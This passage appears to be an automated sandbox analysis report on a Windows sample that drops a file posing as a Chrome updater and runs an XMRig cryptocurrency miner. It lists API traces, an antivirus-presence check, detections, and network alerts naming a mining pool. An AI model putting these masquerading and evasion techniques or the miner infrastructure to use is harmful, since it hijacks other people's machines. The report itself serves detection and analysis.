Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_00000225DC647A40

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.7
192.168.2.5

Contacted Domains

Name	IP	Active
fp2e7a.wpc.phicdn.net	192.229.221.95	true

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ylVAEHbMLf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362356
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ylVAEHbMLf.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51734 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 45.76.89.70:80

Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000008.00000002.2986292449.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000008.00000000.1747836677.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2992018562.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
